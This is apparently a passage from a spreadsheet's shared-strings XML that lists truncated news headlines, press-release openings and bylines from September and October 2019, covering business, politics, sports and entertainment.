    <t>Newswire.com This recently published report examines the global Electron Multipliers market for the projected period of seven years, i.e....</t>
  </si>
  <si>
    <t>Russian president Vladimir Putin’s annual vacation photos, a reliable dose of absurdly over-the-top propaganda, seem to have chilled out in...</t>
  </si>
  <si>
    <t>DUBLIN, Oct. 3, 2019 /PRNewswire/ -- The "Global Parcel Shops and Locker Networks: Market Insight Report 2019" report has been added to...</t>
  </si>
  <si>
    <t>SAN FRANCISCO, Oct. 17, 2019 /PRNewswire/ -- Blueshift, the leading Customer Data Activation Platform, today announced its latest in a...</t>
  </si>
  <si>
    <t>WholeFoods Magazine (www.WholeFoodsMagazine.com), a b-to-b publisher serving the natural products industry, has announced Louisville,...</t>
  </si>
  <si>
    <t>By Alexandra Alper and Mica Rosenberg WASHINGTON/NEW YORK, Oct 8 (Reuters) - The Trump administration on Tuesday said arrests at the...</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 9, 2019 /PRNewswire/ -- iKonex Audio (https://igg.me/at/ikonex-x7) recently announced it was going live on October 10 with...</t>
  </si>
  <si>
    <t>Badri Chatterjee</t>
  </si>
  <si>
    <t>Bandra’s Chimbai beach is under threat from construction projects, locals and environmentalists have alleged. Locals...</t>
  </si>
  <si>
    <t>Read it here!</t>
  </si>
  <si>
    <t>IT experts</t>
  </si>
  <si>
    <t>Employee awareness</t>
  </si>
  <si>
    <t>Rwandan security forces have killed 19 people who were part of a group that carried out a deadly attack in a tourist hub in the north of...</t>
  </si>
  <si>
    <t>John Leicester</t>
  </si>
  <si>
    <t>A homemade, remote-controlled bomb intended to "kill or to harm" riot police was detonated as they deployed against renewed violence in...</t>
  </si>
  <si>
    <t>ValuEngine cut shares of Cinedigm (NASDAQ:CIDM) from a buy rating to a hold rating in a research note published on Wednesday, ValuEngine...</t>
  </si>
  <si>
    <t>National Write Your Congressman (NWYC), an organization that gives small businesses a voice in American government, finds in its Q3 2019...</t>
  </si>
  <si>
    <t>Twitter says it mistakenly used the phone numbers and email addresses people provided for security purposes to show advertisements to its...</t>
  </si>
  <si>
    <t>Dublin, Oct. 10, 2019 (GLOBE NEWSWIRE) -- The "Slovakia Molecular Diagnostic Analyzers and Reagent Forecasts for 100 Tests: Supplier...</t>
  </si>
  <si>
    <t>ISLAMABAD (Reuters) - Pakistan's foreign office on Thursday said that Pakistan and the Taliban agreed that the Afghanistan peace talk...</t>
  </si>
  <si>
    <t>By Hassan Mujtaba</t>
  </si>
  <si>
    <t>AMD will be launching their 3rd Gen Ryzen Threadripper processors premiering with 24 cores next month. While there have been various rumors...</t>
  </si>
  <si>
    <t>Ken Kosirowski</t>
  </si>
  <si>
    <t>La Crescent-Hokah boys soccer's ended 3-2 in overtime to Rochester Lourdes on Tuesday. Andy Lopez and Isaac Petersen provided the goals...</t>
  </si>
  <si>
    <t>Electric aviation company applies KULR’s proprietary technology to improve battery pack design and safety solutions. CAMPBELL, Calif., Oct....</t>
  </si>
  <si>
    <t>Stephan Byrd</t>
  </si>
  <si>
    <t>Shares of Provident Bancorp Inc (NASDAQ:PVBC) traded down 51.2% during trading on Thursday . The company traded as low as $10.75 and last...</t>
  </si>
  <si>
    <t>Daily News staff                        More from Daily News staff</t>
  </si>
  <si>
    <t>The Chatham Maroons erased a two-goal deficit once Saturday, but they couldn’t do it twice. The Komoka Kings scored two unanswered goals in...</t>
  </si>
  <si>
    <t>The Belgium international was substituted at half-time of Tuesday’s Champions League draw with Club Brugge.</t>
  </si>
  <si>
    <t>Hempure CBD has created a comprehensive guide that can help any beginner decide how much CBD to take. Online PR News – 03-October-2019 –...</t>
  </si>
  <si>
    <t>Alf Poor, CEO of Ideanomics, sat down with We-Ha.com to provide updates on the project, and said remediation of buildings on the former...</t>
  </si>
  <si>
    <t>Bloomberg News</t>
  </si>
  <si>
    <t>School districts in New York, Kansas and Missouri sued Juul Labs Inc. over the economic burden created by teen vaping, opening a new legal...</t>
  </si>
  <si>
    <t>Regional Value added distributor Hiperdist, in collaboration with Microsoft, participated in the GITEX Technology Week, held recently in...</t>
  </si>
  <si>
    <t>T-Mobile’s proposed merger with Sprint has reportedly received its third Republican “yes” vote at the FCC, two sources told Bloomberg. The...</t>
  </si>
  <si>
    <t>IRVINE, Calif., Oct. 09, 2019 (GLOBE NEWSWIRE) -- Lantronix, Inc. (the “Company”) (NASDAQ: LTRX), a global provider of secure data access...</t>
  </si>
  <si>
    <t>LAS CRUCES, N.M. U.S. Rep. Xochitl Torres Small is now supporting the impeachment inquiry against President Donald Trump. The first-year...</t>
  </si>
  <si>
    <t>Rachel Ranosa</t>
  </si>
  <si>
    <t>From fire evacuation drills to active shooter simulations, the use of virtual reality (VR) in health and safety trainings offers new hope...</t>
  </si>
  <si>
    <t>With the expansion came tighter regulations that gave the method integrity and encouraged big brands to jump on board. Los Angeles, CA -...</t>
  </si>
  <si>
    <t>D&amp;D owes much to its early community of creatives and creators--these women helped make D&amp;D the game it is. Ask anyone to describe a...</t>
  </si>
  <si>
    <t>A group of Olympic divers from the U.K. team are going viral for a video in which they portray superheroes from the "Avengers" films....</t>
  </si>
  <si>
    <t>Daily News staff</t>
  </si>
  <si>
    <t>TIVERTON — The unofficial votes are in, and Town Council President Robert Coulter and Vice President Justin Katz are out. The final vote...</t>
  </si>
  <si>
    <t>The daily trading volume for Corteva Inc. (NYSE: CTVA) over the last session is 4.56 million shares. CTVA has attracted considerable...</t>
  </si>
  <si>
    <t>WiseGuyReports has announced the addition of a new intelligence report, titled “Global Agricultural and Environmental Diagnostics Market...</t>
  </si>
  <si>
    <t>By ZEKE MILLER Associated Press</t>
  </si>
  <si>
    <t>ANKARA, Turkey (AP) — A senior U.S. delegation led by Vice President Mike Pence pursued an uphill mission Thursday to persuade Turkish...</t>
  </si>
  <si>
    <t>By Pritha Paul</t>
  </si>
  <si>
    <t>Justin Bieber posted an adorable video on Instagram where he jokingly tells his wife Hailey Baldwin that they were going to have a...</t>
  </si>
  <si>
    <t>HOUSTON (AP) — Houston Astros beat Tampa Bay Rays 6-1 in Game 5, advance to AL Championship Series against New York Yankees.</t>
  </si>
  <si>
    <t>Re “Minimum wage hikes didn’t kill jobs” (Sept. 25): Greg David describes a new minimum-wage analysis by the Federal Reserve Bank of New...</t>
  </si>
  <si>
    <t>BellRing Brands (BRBR) is planning to raise $525 million in an IPO on Thursday, October 17th, IPO Scoop reports. The company will be...</t>
  </si>
  <si>
    <t>It’s not every single day you’d shell out $35 for a cup of espresso — OK, it’s domestically grown — neither is it an on a regular basis...</t>
  </si>
  <si>
    <t>Tickers: XTSX:STC, PINX:SAMOF Tags: #Telecommunications MARKHAM, ONTARIO - TheNewswire - October 18, 2019 - Sangoma Technologies...</t>
  </si>
  <si>
    <t>New York, Oct. 14, 2019 (GLOBE NEWSWIRE) -- Reportlinker.com announces the release of the report "Global Fermenters Industry" -...</t>
  </si>
  <si>
    <t>General Electric Co said on Monday it was freezing the pension plan for about 20,000 U.S. employees with salaried benefits, as the...</t>
  </si>
  <si>
    <t>HOUSTON (AP) — A man in the Astros dugout who was not in uniform was hit by a foul ball off the bat of Houston's Michael Brantley during...</t>
  </si>
  <si>
    <t>Kenneth DeLong, Calgary Herald</t>
  </si>
  <si>
    <t>It was the indisposition of the scheduled soloist that enabled the CPO to re-work its Modern Masters concert into a new program that might...</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 15, 2019 (GLOBE NEWSWIRE) -- Pomerantz LLP is investigating claims on behalf of investors of Zendesk, Inc. (“Zendesk” or...</t>
  </si>
  <si>
    <t>This will be the fourth year running that I’ve built holiday gifts around our Farmers’ Market. We have just three more Friday mornings...</t>
  </si>
  <si>
    <t>Andrew Yang, 2020 Democratic candidate for president, talks with Rachel Maddow about how a universal basic income policy will help...</t>
  </si>
  <si>
    <t>An intense “battle for survival” moment between a Tibetan fox and a marmot has won the Wildlife Photographer of the Year competition. The...</t>
  </si>
  <si>
    <t>SHANGHAI, Oct. 2, 2019 /PRNewswire/ -- ReneSola Ltd ("ReneSola" or the "Company") (www.renesolapower.com) (NYSE: SOL), a leading fully...</t>
  </si>
  <si>
    <t>The following issues have been halted by IIROC: Company: NTG Clarity Networks Inc. TSX-Venture Symbol: NCI (all issues) Reason: Pending...</t>
  </si>
  <si>
    <t>A man has died in Brisbane's south, after a terrifying home invasion that was authorities searching for the suspects.</t>
  </si>
  <si>
    <t>Man Group plc lifted its position in shares of Alnylam Pharmaceuticals, Inc. (NASDAQ:ALNY) by 84.2% in the second quarter, according to the...</t>
  </si>
  <si>
    <t>amedpost</t>
  </si>
  <si>
    <t>Houston Rockets sneakers and other merchandise were pulled from several Nike stores in major Chinese cities amid the furor surrounding a...</t>
  </si>
  <si>
    <t>Frank Lampard gives his thoughts on Christian Pulisic and his start to the new season at Chelsea FC</t>
  </si>
  <si>
    <t>SOURCE National Family Partnership Contest Submissions Accepted through November 1 MIAMI, Oct. 18, 2019 /PRNewswire/ -- The 9th Annual...</t>
  </si>
  <si>
    <t>By: 23ABC Digital Staff</t>
  </si>
  <si>
    <t>BAKERSFIELD, Calif. — Louise Abraham's brother, Carlos Abraham, was defending her when they were both fatally shot by the father of her...</t>
  </si>
  <si>
    <t>Indiana Pacers player Jeremy Lamb, white, plays against Sacramento Kings at the NBA India Games 2019, in Mumbai, India, Saturday, Oct. 5,...</t>
  </si>
  <si>
    <t>The "Refrigerated Transport - Global Market Outlook (2018-2027)" report has been added to ResearchAndMarkets.com's offering. The Global...</t>
  </si>
  <si>
    <t>Click here to read the full article. Timothée Chalamet became the youngest Best Actor Oscar nominee in nearly 80 years when he landed...</t>
  </si>
  <si>
    <t>US music producer Timbaland – famous for working with Justin Timberlake, Madonna and Jay-Z – said his music is in “great hands” as he sold...</t>
  </si>
  <si>
    <t>Willow Fiddler</t>
  </si>
  <si>
    <t>Willow Fiddler APTN News University leaders are at the former Shingwauk residential school to talk about reconciliation – and to learn more...</t>
  </si>
  <si>
    <t>Company Representatives Talk New Brand and Franchise Opportunities in Cannabis at Booth No. 416 NEW YORK, Oct. 4, 2019 /PRNewswire/ - ONE...</t>
  </si>
  <si>
    <t>Gyroscope Capital Management Group LLC cut its stake in shares of Delta Air Lines, Inc. (NYSE:DAL) by 7.6% during the 3rd quarter,...</t>
  </si>
  <si>
    <t>Originally posted on https://denverlocksmith.com/7-benefits-of-using-a-mobile-locksmith/ We’ve all done it. That dreaded moment when you...</t>
  </si>
  <si>
    <t>One of Atlanta's premiere dentists, Dr. Frank Roach has delivered exceptional care for decades and consistently provides his patients the...</t>
  </si>
  <si>
    <t>Harper Beckham has abilities in the kitchen!</t>
  </si>
  <si>
    <t>Lead candidate ONL1204 advances into Phase I clinical study in retinal detachment in Australia ANN ARBOR, Mich., Oct. 08, 2019 (GLOBE...</t>
  </si>
  <si>
    <t>LONDON (AP) - British Prime Minister Boris Johnson is set to brief his Cabinet on the progress of last-minute Brexit talks with the...</t>
  </si>
  <si>
    <t>Jon Roe</t>
  </si>
  <si>
    <t>Disney in Concert: Mary Poppins Where: Jack Singer Concert Hall When: Oct. 11-12The Calgary Philharmonic Orchestra play classic favourites...</t>
  </si>
  <si>
    <t>New Residential Investment Corp. (NYSE:NRZ) New Residential Investment Corp. (NYSE:NRZ) closed at $14.98 on the last trading session with...</t>
  </si>
  <si>
    <t>Andrew Cornell</t>
  </si>
  <si>
    <t>As the world talks about the fintech revolution, the financial technology having the most dramatic impact on global payments today is...</t>
  </si>
  <si>
    <t>October 10, 2019 (Investorideas.com Newswire) Wind energy researchers from the U.S. Department of Energy's National Renewable Energy...</t>
  </si>
  <si>
    <t>Recent release "Penelope" from Page Publishing by author Christine Bialczak is a children's book celebrating both the wonders of nature and...</t>
  </si>
  <si>
    <t>Kristie Rieken</t>
  </si>
  <si>
    <t>HOUSTON — Justin Verlander looked every bit the October ace, Jose Altuve polished his post-season resume and the Houston Astros kept...</t>
  </si>
  <si>
    <t>Elliot Montanez</t>
  </si>
  <si>
    <t>Today we have an emcee who is making his initial appearance on our website, he goes by the name of Kings Cvstle &amp; he just released a new...</t>
  </si>
  <si>
    <t>Bank of America says that "ongoing trade uncertainty" and "signs of macro deterioration" will keep the S&amp;P at its current level for the...</t>
  </si>
  <si>
    <t>U of T President Meric Gertler (photo by Jon Horvatin) University of Toronto President Meric Gertler said he was devastated to learn of...</t>
  </si>
  <si>
    <t>Maggie Avants, Patch Staff</t>
  </si>
  <si>
    <t>Power was not cut to Benicia and Vallejo, but other Solano County outages prompted both cities to use backup methods to keep water flowing.</t>
  </si>
  <si>
    <t>72 extra Cleveland Police officers to be recruited 'very quickly' | Hartlepool Mail</t>
  </si>
  <si>
    <t>Chemicals Research</t>
  </si>
  <si>
    <t>PARIS (AP) — France's interior minister has acknowledged that there was a breach in security that failed to detect signs of radicalization...</t>
  </si>
  <si>
    <t>Liza Womack, mother of Lil Peep, today filed a lawsuit accusing her son’s manager, Sarah Stennett, and employees of her company of...</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 16, 2019 (GLOBE NEWSWIRE) -- Bragar Eagel &amp; Squire, P.C. reminds investors that class action lawsuits have been commenced...</t>
  </si>
  <si>
    <t>HERNDON, Va., Oct. 10, 2019 /PRNewswire/ -- DLT Solutions, a premier government technology solutions aggregator, is launching the...</t>
  </si>
  <si>
    <t>ABC News</t>
  </si>
  <si>
    <t>Hong Kong leader is again forced from the legislative chamber because of protests by opposition members that follow a bloody attack on a...</t>
  </si>
  <si>
    <t>SAN FRANCISCO, Oct. 15, 2019 /PRNewswire/ -- LendingClub Corporation (NYSE: LC), America's largest online lending marketplace connecting...</t>
  </si>
  <si>
    <t>DUBLIN, Oct. 3, 2019 /PRNewswire/ -- The "Respiratory Devices Global Market - Forecast to 2026" report has been added to...</t>
  </si>
  <si>
    <t>VANCOUVER, BC / ACCESSWIRE / October 17, 2019 / YDX Innovation Corp. (TSXV:YDX.VN) (OTC PINK:YDRMF) (FSE:A2PB03) ("YDX" or the "Company")...</t>
  </si>
  <si>
    <t>Join Revolutionary HR Consulting CEO and Join the Revolution host, LaCoya Shelton, for this extraordinary episode on how selfless service...</t>
  </si>
  <si>
    <t>Russell Broadbent says the Australian Government must remember that the imprisoned families of Islamic State fighters are "women and...</t>
  </si>
  <si>
    <t>By Iain Smith</t>
  </si>
  <si>
    <t>STIRLING'S up and coming tennis star Rosie Sterk is the latest talent to join to feature in the #StirlingShines campaign with the Thistles...</t>
  </si>
  <si>
    <t>School gates can be a breeding ground for harmful myths about the MMR vaccine, NHS England’s chief executive has warned. This can causes...</t>
  </si>
  <si>
    <t>JACKSONVILLE, Fla. (AP) — The Jacksonville Jaguars have ruled out star cornerback Jalen Ramsey for Sunday's game at Carolina.</t>
  </si>
  <si>
    <t>The Dominion Post, Morgantown, W.Va. - By Kathy Plum The Dominion Post, Morgantown, W.Va.</t>
  </si>
  <si>
    <t>Oct. 11--KINGWOOD -- "The cavalry's coming, and we've already come, and we're not going to go away till the last road's fixed. That's all...</t>
  </si>
  <si>
    <t>Three scientists, including a British-American chemistry professor, have been jointly awarded the 2019 Nobel Prize for Chemistry for their...</t>
  </si>
  <si>
    <t>The swift-moving impeachment probe pushed onward Wednesday as a former top State Department aide testified that the Trump administration’s...</t>
  </si>
  <si>
    <t>Sarah, Duchess of York, has told of her joy at seeing daughter Princess Beatrice’s “eyes shining” following her engagement. Beatrice is...</t>
  </si>
  <si>
    <t>By Lisa Respers France, CNN</t>
  </si>
  <si>
    <t>(CNN)"Hamilton" star Miguel Cervantes and his wife, Kelly, have paid tribute to their 3-year[-old daughter Adelaide who died over the...</t>
  </si>
  <si>
    <t>A FRAUDSTER who transferred his share of a house to avoid paying his creditors has been jailed for four months.</t>
  </si>
  <si>
    <t>Anxiety and Panic Disorders Drugs Market Insights 2018, is knowledgeable and in-depth examine on the latest country of the international...</t>
  </si>
  <si>
    <t>SOURCE: Ethical Corporation Transitioning from a linear to a circular economy is one of the biggest challenges the industry faces, reducing...</t>
  </si>
  <si>
    <t>City &amp; State's Health Innovation Summit informed health care decision makers, tech leaders and policy experts on the most critical issues...</t>
  </si>
  <si>
    <t>The newest book launched by Jan Erik Horgen, called “10 Secrets to Marketing Success Through Analytics: Marketing Analytics Articles With...</t>
  </si>
  <si>
    <t>Oct, Wed 16 2019 - 6:30 PM to 9:30 PM</t>
  </si>
  <si>
    <t>Scientists have chosen an ice floe on which to begin setting up a research camp for a year-long international expedition to study the...</t>
  </si>
  <si>
    <t>IOWA CITY, Iowa (AP) — The Iowa Supreme Court says the founder of a boarding school for troubled youth will get another chance to...</t>
  </si>
  <si>
    <t>Lau Associates LLC raised its stake in shares of Wells Fargo &amp; Co (NYSE:WFC) by 6.2% in the 3rd quarter, Holdings Channel.com reports. The...</t>
  </si>
  <si>
    <t>EMERYVILLE, Calif., Oct. 10, 2019 /PRNewswire/ -- Amyris, Inc. (Nasdaq: AMRS), a leader in the development and production of sustainable...</t>
  </si>
  <si>
    <t>BALTIMORE, Oct. 1, 2019 /PRNewswire/ -- Vitamin®, a leading digital-first integrated marketing agency, has designed and developed a new...</t>
  </si>
  <si>
    <t>It is said that the husband committed suicide yesterday after strangling his wife dead. Burera district vice mayor for economic affairs,...</t>
  </si>
  <si>
    <t>Hadlee Simons</t>
  </si>
  <si>
    <t>Google The Google Pixel 4 series will pack advanced facial recognition functionality, enabling users to quickly unlock their devices and...</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 8, 2019 /PRNewswire-PRWeb/ -- iQ4 Corporation, a collaborative, technology-based skills transfer platform helping students,...</t>
  </si>
  <si>
    <t>Captrust Financial Advisors grew its stake in shares of Baxter International Inc (NYSE:BAX) by 4.2% during the 2nd quarter, according to...</t>
  </si>
  <si>
    <t>k.collazi (Posted by)</t>
  </si>
  <si>
    <t>how come when a pig dies in uniform no one ever says 'they died doing what they loved?' — Mike Isaacson (@VulgarEconomics) January 23,...</t>
  </si>
  <si>
    <t>Dick’s Sporting Goods has destroyed $5 million of the chain’s gun inventory, its CEO said. After finding out that Dick’s had sold the...</t>
  </si>
  <si>
    <t>Stage Tube</t>
  </si>
  <si>
    <t>David Harbour hosted last night's episode of Saturday Night Live! During his opening monologue, he gave a backstage tour of SNL and ended...</t>
  </si>
  <si>
    <t>Topic : Black Mail Nahi Hon Ga...Imran Khan... Nehal Hashmi PML-N, Andleeb Abbas PTI, Faisal Karim Khan Kundi PPP and Hafiz Hamdullah...</t>
  </si>
  <si>
    <t>liizu (Posted by)</t>
  </si>
  <si>
    <t>Your browser does not support HTML5 video. Harvey Proctor has led calls for Met police chiefs to face justice after a report laid bare the...</t>
  </si>
  <si>
    <t>OTTAWA — New Democrat Leader Jagmeet Singh is invoking the legacy of his venerated predecessor, hoping that the memory of Jack Layton — the...</t>
  </si>
  <si>
    <t>Nokian Tyres Opening A Finnish company opens a new tire plant in Dayton. Nokian officials explain the premium product they are bringing...</t>
  </si>
  <si>
    <t>Eamonn Tiernan and Scott Bailey</t>
  </si>
  <si>
    <t>There's an awfully long way to go but Jack Wighton is on the right path toward emulating Canberra legend Laurie Daley, believes three-time...</t>
  </si>
  <si>
    <t>Amanda Jackson, CNN</t>
  </si>
  <si>
    <t>Team strapped dog to a litter</t>
  </si>
  <si>
    <t>Shay Mitchell has created a music video for the 'Baby Mama Dance' she's been performing in a bid to coax labour. The 'Pretty Little Liars'...</t>
  </si>
  <si>
    <t>The Sovereign Nation of the Chitimacha and Chitimacha Powwow Committee is proud to announce the 6th Annual Chitimacha Powwow 2019,...</t>
  </si>
  <si>
    <t>Goal.com</t>
  </si>
  <si>
    <t>Xherdan Shaqiri may be “naturally-gifted”, but Peter Crouch says the Switzerland international is being frozen out at Liverpool because...</t>
  </si>
  <si>
    <t>Anthony Kearney</t>
  </si>
  <si>
    <t>Analysts expect Arcus Biosciences, Inc. (NYSE:RCUS) to report $-0.47 EPS on November, 14.They anticipate $0.22 EPS change or 88.00 % from...</t>
  </si>
  <si>
    <t>New vehicles displayed at inter airport Europe 2019, the 22nd International Exhibition for Airport Equipment, Technology, Design and...</t>
  </si>
  <si>
    <t>Corey A. DeAngelis Education reporters frequently make the claim that government ought to fund and operate educational institutions...</t>
  </si>
  <si>
    <t>Hong Kong’s wealthiest man will donate HK$1 billion (US$128 million) to local businesses, his foundation said on Friday, as Asia’s...</t>
  </si>
  <si>
    <t>Raphael Tsavkko Garcia</t>
  </si>
  <si>
    <t>As companies like Facebook move to make encryption standard in messaging, governments are fighting back</t>
  </si>
  <si>
    <t>by                                                                                                 Alex Barutha</t>
  </si>
  <si>
    <t>These players could deliver big value on Draft Day:...</t>
  </si>
  <si>
    <t>In all three cases, the suspect was wearing bags over his head, hands and sometimes feet.</t>
  </si>
  <si>
    <t>Sound United has announced that it has terminated it’s agreement to acquire Onkyo Corporation’s consumer audio division, including...</t>
  </si>
  <si>
    <t>Wall Street struggled for direction on Friday as upbeat earnings reports calmed nerves about the global economy after China expanded at its...</t>
  </si>
  <si>
    <t>BOULDER, Colo., Oct. 16, 2019 /PRNewswire/ -- Techstars, the worldwide network that helps entrepreneurs succeed, today announced the launch...</t>
  </si>
  <si>
    <t>KENOSHA, Wis. (AP) — Kenosha County prosecutors say the mother of two brothers accused of manufacturing vaping cartridges with THC oil was...</t>
  </si>
  <si>
    <t>EU antitrust regulators will this month order U.S. chipmaker Broadcom to scrap its exclusivity clauses with TV and modem makers while they...</t>
  </si>
  <si>
    <t>Hagens Berman Sobol Shapiro LLP</t>
  </si>
  <si>
    <t>Class-action law firm urges SNDL investors who have suffered losses of $50,000+ to learn their shareholder rights</t>
  </si>
  <si>
    <t>By CAMERON ROGERS Edmunds</t>
  </si>
  <si>
    <t>Sales of subcompact crossover SUVs have surged by 60% over the past few years, according to Edmunds' transaction data. Two of the more...</t>
  </si>
  <si>
    <t>Asia Gaming Brief</t>
  </si>
  <si>
    <t>Wynn Resorts has confirmed that it has withdrawn from the integrated resort race in Osaka, Japan, and will focus its efforts on gaining an...</t>
  </si>
  <si>
    <t>(HealthDay)—Walgreens and Kroger have followed Walmart and Rite Aid in halting sales of electronic cigarettes. "We have made the decision...</t>
  </si>
  <si>
    <t>NINGBO, China, Oct. 11, 2019 /PRNewswire/ -- Chinese solar panel maker Risen Energy Co., Ltd. recently announced the receipt of an order to...</t>
  </si>
  <si>
    <t>Chloe-lee Longhetti For Daily Mail Australia</t>
  </si>
  <si>
    <t>If a couple can survive going on The Block together, they can surely survive anything. And on Tuesday's episode, villain Jesse hinted that...</t>
  </si>
  <si>
    <t>Tribune Desk</t>
  </si>
  <si>
    <t>A chronological timetable of historical events that occurred on this day in history. Historical facts of the day in the areas of military,...</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 11, 2019 /PRNewswire/ -- As previously announced on October 9, 2019, Bernstein Litowitz Berger &amp; Grossmann LLP ("BLB&amp;G")...</t>
  </si>
  <si>
    <t>PHOENIX, Oct. 11, 2019 /PRNewswire-PRWeb/ -- When The Origins Podcast with Lawrence Krauss launched June 21st of this year, simultaneously...</t>
  </si>
  <si>
    <t>Howard Schneider</t>
  </si>
  <si>
    <t>BOSTON (Reuters) - Boston Federal Reserve officials have a pretty good idea what helped the ailing industrial town of Lawrence,...</t>
  </si>
  <si>
    <t>Mr. David DeWitt reports FUSION GOLD LTD. ANNOUNCES DEFINITIVE AGREEMENT AND UPDATE ON PROPOSED QUALIFYING TRANSACTION WITH BATTERY...</t>
  </si>
  <si>
    <t>BERLIN (AP) — One of Berlin's most popular kebab stands, in a city famous for its Turkish-style kebabs, has been temporarily shut down...</t>
  </si>
  <si>
    <t>Total Food Service</t>
  </si>
  <si>
    <t>The Society for Hospitality &amp; Foodservice Management (SHFM), the pre-eminent national association serving the needs and interests of...</t>
  </si>
  <si>
    <t>Just 6% of migrants who crossed the Channel illegally on small boats have been deported by the UK since December, Sky News can reveal....</t>
  </si>
  <si>
    <t>/EIN News/ -- Tampa Bay, FL, Oct. 15, 2019 (GLOBE NEWSWIRE) -- KnowBe4, the provider of the world’s largest security awareness training and...</t>
  </si>
  <si>
    <t>By NFL Nation</t>
  </si>
  <si>
    <t>As we conduct another version of the NFL Power Rankings, we got to thinking -- what's the one thing that could hold each team back? Some...</t>
  </si>
  <si>
    <t>Christina Aguilera finds it hard to juggle her career with life as a mother. The 'Beautiful' hitmaker has son Max, 11, with ex-husband...</t>
  </si>
  <si>
    <t>Our brains are washed by a constant flow of cerebrospinal fluid, which plays the important role of carrying away waste substances, such as...</t>
  </si>
  <si>
    <t>Biotechnology major Biocon and pharmaceutical company Mylan N V on Thursday announced the launch of their insulin biosimilar Semglee,...</t>
  </si>
  <si>
    <t>Akanksha Bakshi</t>
  </si>
  <si>
    <t>eGain Communications (NASDAQ:EGAN): Q4 Non-GAAP EPS of $0.02 in-line; GAAP EPS of $0.01. Revenue of $16.82M (+7.9% Y/Y) beats by $0.36M....</t>
  </si>
  <si>
    <t>Slate Copy Desk</t>
  </si>
  <si>
    <t>Meanwhile, those born in September 2001 will be eligible to vote this fall.</t>
  </si>
  <si>
    <t>NEW YORK, Sept. 23, 2019 /PRNewswire/ -- Today, Toronto's own breaking star KILLY announces the Light Path 8 North American Tour. The...</t>
  </si>
  <si>
    <t>Fred Herman</t>
  </si>
  <si>
    <t>Investors sentiment increased to 1.29 in Q1 2019. Its up 0.22, from 1.07 in 2018Q4. It increased, as 29 investors sold WPX shares while 97...</t>
  </si>
  <si>
    <t>Sales of Imcon Edge Connectivity Solutions in India to Commence in 4th Quarter ATLANTA, GA / ACCESSWIRE / September 26, 2019 / Imcon...</t>
  </si>
  <si>
    <t>As Bollywood's heartthrob Ranbir Kapoor ringed his 37th birthday these days, his mom and actor Neetu took a trip down the reminiscence lane...</t>
  </si>
  <si>
    <t>(Washington, DC) – Today, Congressman Albio Sires (D-NJ) released the following statement calling for an impeachment inquiry: “The...</t>
  </si>
  <si>
    <t>Boris Johnson’s decision to suspend Parliament has been ruled “improper” and “unlawful” by three senior Scottish judges, who concluded it...</t>
  </si>
  <si>
    <t>SPONSORED CONTENT -- (StatePoint) If you’re like many Americans, your car is your lifeline. When it’s in need of repair, being able to...</t>
  </si>
  <si>
    <t>Korea Investment CORP decreased its holdings in Union Pacific Co. (NYSE:UNP) by 11.5% during the 2nd quarter, according to the company in...</t>
  </si>
  <si>
    <t>Watch #Nani Hilarious Counter To Anchor #GeethaBhagat Punches #GangLeader Please Subscribe us : https://goo.gl/N1GMjx For more updates...</t>
  </si>
  <si>
    <t>By Laurie Higgins</t>
  </si>
  <si>
    <t>For quite a few years when I was growing up, my parents grew most of our food. Their garden was so huge that I get exhausted just looking...</t>
  </si>
  <si>
    <t>By Joe Middleton For Mailonline</t>
  </si>
  <si>
    <t>Sheila Hancock, 86, was away filming when the raiders struck in broad daylight Police are now investigating the break-in at the 17th...</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / September 9, 2019 / Levi &amp; Korsinsky, LLP announces that class action lawsuits have commenced on behalf of...</t>
  </si>
  <si>
    <t>Today : Monday 16 September 2019 By Colin Kellaher Weyerhaeuser Co. (WY) on Monday said it agreed to sell its 555,000 acres of Michigan...</t>
  </si>
  <si>
    <t>ST. LOUIS (AP) — The daughter of a former St. Louis police chief alleges in a lawsuit that she wasn't taken to a hospital for 24 hours...</t>
  </si>
  <si>
    <t>Kroll Bond Rating Agency (KBRA) releases its KBRA Credit Profile (KCP) K-LOC Index for the month of August. K-LOC Index The KBRA Loan of...</t>
  </si>
  <si>
    <t>Lindsay MacDonald</t>
  </si>
  <si>
    <t>Arrow Season 8 is nearly upon us, and now we finally have our first photos from the final season. It really is the beginning of the end!...</t>
  </si>
  <si>
    <t>President Donald Trump and Australian Prime Minister Scott Morrison arrive for a news conference in the East Room of the White House in...</t>
  </si>
  <si>
    <t>TORONTO, Sept. 26, 2019 /CNW/ - Summit Industrial Income REIT ("Summit II" or the "REIT") (TSX: SMU.UN) announced today that it will be...</t>
  </si>
  <si>
    <t>MACOMB, Ill. (AP) — Logan Jones ran for 167 yards and two touchdowns and Montana State defeated Western Illinois 23-14 on Saturday. Jones,...</t>
  </si>
  <si>
    <t>Look inside the latest homes on the market in the Anne Arundel area. 21 River Dr Severna Park, Maryland 21146 940 Astern Way Unit 60...</t>
  </si>
  <si>
    <t>Its practitioners have a “philosophical aversion” to prescription drugs, embrace homeopathy — a practice experts dismiss as scientifically...</t>
  </si>
  <si>
    <t>Sept. 29-- LEXINGTON, Ky.-You don't have to be a dedicated Thoroughbred racing fan to know it has been a tumultuous and controversial...</t>
  </si>
  <si>
    <t>Syazwani Hj Rosli &amp; Wani Roslan Yayasan Sultan Haji Hassanal Bolkiah (YSHHB) Primary School organised a Teacher’s Day celebration...</t>
  </si>
  <si>
    <t>eGain Corp (NASDAQ:EGAN) saw a significant increase in short interest in the month of August. As of August 31st, there was short interest...</t>
  </si>
  <si>
    <t>By Advertiser Reporter</t>
  </si>
  <si>
    <t>Comments by the people of Swindon on the future of transport in the wider region are sought. England's Economic Heartland, a group of a...</t>
  </si>
  <si>
    <t>SOMERSWORTH —The Somersworth Festival Association will sponsor their 27th Harvest Craft Fair on Sat., October 26 from 9:00 a.m. to 3:00...</t>
  </si>
  <si>
    <t>By Tom Hudson, Miami Herald</t>
  </si>
  <si>
    <t>Apple CEO Tim Cook introduces the iPhone 7 at the product launch held at the Bill Graham Civic Auditorium in San Francisco on September 7,...</t>
  </si>
  <si>
    <t>STEVE PEOPLES and JULIE PACE Associated Press</t>
  </si>
  <si>
    <t>MANCHESTER, N.H. (AP) — When Joe Biden took the stage in New Hampshire, he was greeted with the respect that comes with being a former vice...</t>
  </si>
  <si>
    <t>The Pakistan Advertising Association (PAA) held its Annual General Meeting (AGM) on 28th September, 2019, to announce its election results...</t>
  </si>
  <si>
